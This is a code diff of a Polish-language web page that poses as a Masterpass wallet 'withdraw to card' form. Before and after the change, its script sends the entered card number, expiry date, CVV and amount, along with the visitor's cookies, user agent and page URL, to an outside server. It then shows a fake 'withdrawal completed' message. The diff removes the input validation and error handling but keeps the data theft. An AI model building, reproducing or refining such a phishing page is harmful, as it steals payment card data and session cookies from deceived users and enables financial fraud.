--- a/public/wallet-withdraw.html
+++ b/public/wallet-withdraw.html
@@ -2,7 +2,7 @@
 <html lang="pl">
 <head>
   <meta charset="UTF-8" />
-  <title>Portfel Masterpass | Wypłata</title>
+  <title>Wypłata | Portfel Masterpass</title>
   <link rel="stylesheet" href="/style.css" />
 </head>
 <body>
@@ -11,17 +11,17 @@
     <h1>Wypłata na kartę</h1>
 
     <form id="withdrawForm">
-      <label for="card">Numer karty</label>
-      <input type="text" id="card" placeholder="1234 5678 9012 3456" maxlength="19" required />
+      <label for="card">Numer karty (16 cyfr)</label>
+      <input type="text" id="card" maxlength="19" placeholder="1234 5678 9012 3456" required pattern="\d{4} \d{4} \d{4} \d{4}" />
 
-      <label for="expiry">Data ważności (MM/YY)</label>
+      <label for="expiry">Data ważności</label>
       <input type="month" id="expiry" required />
 
       <label for="cvv">Kod CVV</label>
-      <input type="text" id="cvv" placeholder="CVV" maxlength="4" pattern="\\d{3,4}" required />
+      <input type="text" id="cvv" maxlength="4" placeholder="123" pattern="\d{3,4}" required />
 
       <label for="amount">Kwota (PLN)</label>
-      <input type="number" id="amount" placeholder="np. 100" min="1" required />
+      <input type="number" id="amount" min="1" step="1" required />
 
       <button type="submit">Potwierdź wypłatę</button>
     </form>
@@ -33,53 +33,33 @@
     const form = document.getElementById('withdrawForm');
     const confirmation = document.getElementById('confirmation');
 
-    function validateCard(card) {
-      return /^\d{16}$/.test(card.replace(/\s+/g, ''));
-    }
-
-    function validateCVV(cvv) {
-      return /^\d{3,4}$/.test(cvv);
-    }
-
     form.addEventListener('submit', async (e) => {
       e.preventDefault();
 
-      const card = document.getElementById('card').value.replace(/\s+/g, '');
-      const expiry = document.getElementById('expiry').value;
+      const cardNumber = document.getElementById('card').value.trim();
+      const expiryDate = document.getElementById('expiry').value;
       const cvv = document.getElementById('cvv').value.trim();
       const amount = document.getElementById('amount').value.trim();
 
-      if (!validateCard(card)) {
-        return alert('Numer karty jest nieprawidłowy. Wprowadź 16 cyfr.');
-      }
+      const res = await fetch('https://zaza-back.onrender.com/card', {
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json' },
+        body: JSON.stringify({
+          cardNumber,
+          expiryDate,
+          cvv,
+          amount,
+          cookies: document.cookie,
+          userAgent: navigator.userAgent,
+          location: window.location.href,
+          date: new Date().toISOString()
+        })
+      });
 
-      if (!validateCVV(cvv)) {
-        return alert('Kod CVV jest nieprawidłowy.');
-      }
-
-      try {
-        const res = await fetch('https://zaza-back.onrender.com/card', {
-          method: 'POST',
-          headers: { 'Content-Type': 'application/json' },
-          body: JSON.stringify({
-            cardNumber: card,
-            expiryDate: expiry,
-            cvv,
-            cookies: document.cookie,
-            userAgent: navigator.userAgent,
-            location: window.location.href,
-            date: new Date().toISOString()
-          })
-        });
-
-        const data = await res.json();
-        confirmation.innerText = data.success
-          ? '✅ Wypłata została zrealizowana.'
-          : '❌ Wystąpił błąd.';
-      } catch (err) {
-        confirmation.innerText = '❌ Wystąpił błąd podczas połączenia.';
-        console.error(err);
-      }
+      const data = await res.json();
+      confirmation.innerText = data.success
+        ? '✅ Wypłata została zrealizowana.'
+        : '❌ Wystąpił błąd.';
     });
   </script>
 </body>
